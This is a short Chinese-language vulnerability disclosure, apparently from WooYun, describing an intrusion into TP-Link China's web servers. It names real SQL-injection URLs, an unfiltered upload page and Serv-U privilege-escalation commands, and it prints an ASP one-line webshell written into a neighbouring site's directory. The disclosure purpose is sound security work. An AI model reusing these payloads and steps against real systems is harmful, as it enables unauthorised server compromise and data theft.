WooYun.org

注入点几枚

http://www.tp-link.cn/pages/smb/products.asp?c=3

http://www.tp-link.cn/pages/article-detail.asp?result=school&d=157

厂商还是全部代码都查查吧，全局过滤一下。
sqlmap跑出了密码:

后台的安全是在是不可以恭维啊。
http://www.tp-link.cn/pages/cms/upload.asp
什么都不过滤。。。
shell的权限挺小的，这个目录不支持aspx，本盘不能跨目录。

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\

目录下读取到了支持aspx的目录
读取C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\f6ef54bd\de1a25fb\App_Web_8tlihkqz.0.cs文件发现还有aspx的站在服务器上。
跨不过去，翻了下43598端口开了，用servu的提权脚本执行：

whoami >I:\tpwebroot\download\2.txt

发现servu被降权了，是user权限，不过权限也很高了，试着一下dir I:\ >I:\tpwebroot\download\3.txt,列出目录了，有读取权限，一层一层读下去，找到了其他网站的路径，直接

echo ^<%execute^(request^("#"^)^)%^> >I:\mobileMVC\test.asp

搞到了http://www.tp-linkmobile.com.cn/，同理还有http://bbs.tp-linkmobile.com.cn。。。后面就不继续了，希望厂商还是控制下目录权限吧，好多个应用放到一个站。